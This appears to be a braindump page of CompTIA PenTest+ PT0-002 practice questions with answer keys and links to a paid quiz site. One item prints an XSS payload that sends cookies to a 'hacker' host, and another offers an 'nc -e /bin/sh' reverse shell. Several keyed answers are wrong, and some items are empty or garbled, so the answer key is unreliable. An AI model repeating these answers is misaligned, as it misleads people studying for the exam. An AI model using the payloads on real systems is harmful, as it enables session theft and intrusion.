[Oct 28, 2021] Updates Up to 365 days On Valid PT0-002 Braindumps [Q57-Q78]

[Oct 28, 2021] Updates Up to 365 days On Valid PT0-002 Braindumps

Best QualityPT0-002 Exam Questions  CompTIA Test To Gain Brilliante Result

NEW QUESTION 57
A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings?

• A. Utilize an nmap -sV scan against the service
• B. Manually check the version number of the VoIP service against the CVE release
• C. Test with proof-of-concept code from an exploit database
• D. Review SIP traffic from an on-path position to look for indicators of compromise

Answer: A

 

NEW QUESTION 58
A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?

• A. ROE
• B. MSA
• C. NDA
• D. SLA

Answer: C

 

NEW QUESTION 59
A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the highest likelihood of success?

• A. Performing spear phishing against employees by posing as senior management
• B. Using a brute-force attack against the external perimeter to gain a foothold
• C. Dropping a malicious USB key with the company's logo in the parking lot
• D. Attempting to tailgate an employee going into the client's workplace

Answer: B

 

NEW QUESTION 60
Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:

• A. may reduce the true positive rate of findings.
• B. may cause unintended failures in control systems.
• C. will create a denial-of-service condition on the IP networks.
• D. will reveal vulnerabilities in the Modbus protocol.

Answer: B

 

NEW QUESTION 61
A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

• A. Wireshark
• B. Aircrack-ng
• C. Kismet
• D. Wifite

Answer: B

 

NEW QUESTION 62
Which of the following is the MOST effective person to validate results from a penetration test?

• A. Third party
• B. Chief Information Officer
• C. Client
• D. Team leader

Answer: D

 

NEW QUESTION 63
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Answer:

Explanation:

 

NEW QUESTION 64
An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

• A. OWASP ZAP
• B. Drozer
• C. Burp Suite
• D. OpenVAS

Answer: D

 

NEW QUESTION 65
A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen. A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM. Which of the following cloud attacks did the penetration tester MOST likely implement?

• A. Malware injection
• B. Direct-to-origin
• C. Cross-site scripting
• D. Credential harvesting

Answer: B

 

NEW QUESTION 66
Given the following output:
User-agent:*
Disallow: /author/
Disallow: /xmlrpc.php
Disallow: /wp-admin
Disallow: /page/
During which of the following activities was this output MOST likely obtained?

• A. URL enumeration
• B. Website cloning
• C. Website scraping
• D. Domain enumeration

Answer: C

 

NEW QUESTION 67
A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:
Pre-engagement interaction (scoping and ROE)
Intelligence gathering (reconnaissance)
Threat modeling
Vulnerability analysis
Exploitation and post exploitation
Reporting
Which of the following methodologies does the client use?

• A. OSSTMM
• B. PTES technical guidelines
• C. NIST SP 800-115
• D. OWASP Web Security Testing Guide

Answer: B

 

NEW QUESTION 68
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

• A. Open-source research
• B. Traffic sniffing
• C. A vulnerability scan
• D. An Nmap scan
• E. A ping sweep
• F. Port knocking

Answer: C,D

 

NEW QUESTION 69
A penetration tester conducted a vulnerability scan against a client's critical servers and found the following:

Which of the following would be a recommendation for remediation?

• A. Implement a patch management plan
• B. Utilize the secure software development life cycle
• C. Deploy a user training program
• D. Configure access controls on each of the servers

Answer: A

 

NEW QUESTION 70
A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

• A. Cain and Abel
• B. John the Ripper
• C. Mimikatz
• D. Hydra

Answer: B

 

NEW QUESTION 71
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

• A. nmap 192.168.1.1-5 -Ss22-25,80
• B. nmap 192.168.1.1-5 -PA22-25,80
• C. nmap 192.168.1.1-5 -PU22-25,80
• D. nmap 192.168.1.1-5 -PS22-25,80

Answer: D

 

NEW QUESTION 72
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

• A. Run the nc -e /bin/sh <...> command.
• B. Obtain /etc/shadow and brute force the root password.
• C. Move laterally to create a user account on LDAP
• D. Create a one-shot systemd service to establish a reverse shell.

Answer: A

 

NEW QUESTION 73
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

• A. Input validation
• B. Web-application firewall
• C. Output encoding
• D. Session tokens
• E. Base64 encoding
• F. Parameterized queries

Answer: D,F

 

NEW QUESTION 74
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

• A. bcrypt
• B. SHA-1
• C. PBKDF2
• D. MD5

Answer: D

 

NEW QUESTION 75
A penetration tester performs the following command:
curl -I -http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?

• A. Option C
• B. Option A
• C. Option B
• D. Option D

Answer: B

 

NEW QUESTION 76
A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?

• A. The reverse-engineering team will be given access to source code for analysis.
• B. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
• C. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
• D. The reverse-engineering team may have a history of selling exploits to third parties.

Answer: A

 

NEW QUESTION 77
A penetration tester runs a scan against a server and obtains the following output:
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-12-20 09:23AM 331 index.aspx
| ftp-syst:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2012 Std
3389/tcp open ssl/ms-wbt-server
| rdp-ntlm-info:
| Target Name: WEB3
| NetBIOS_Computer_Name: WEB3
| Product_Version: 6.3.9600
|_ System_Time: 2021-01-15T11:32:06+00:00
8443/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
Which of the following command sequences should the penetration tester try NEXT?

• A. smbclient \\\\WEB3\\IPC$ -I 192.168.53.23 -U guest
• B. nmap --script vuln -sV 192.168.53.23
• C. curl -X TRACE https://192.168.53.23:8443/index.aspx
• D. ncrack -u Administrator -P 15worst_passwords.txt -p rdp 192.168.53.23
• E. ftp 192.168.53.23

Answer: E

 

NEW QUESTION 78
......

Focus on PT0-002 All-in-One Exam Guide For Quick Preparation: https://www.pass4surequiz.com/PT0-002-exam-quiz.html

Tested Material Used To PT0-002: https://drive.google.com/open?id=1DTwGX--vm1qp5MaZ60iSBcSSDlZdDPkH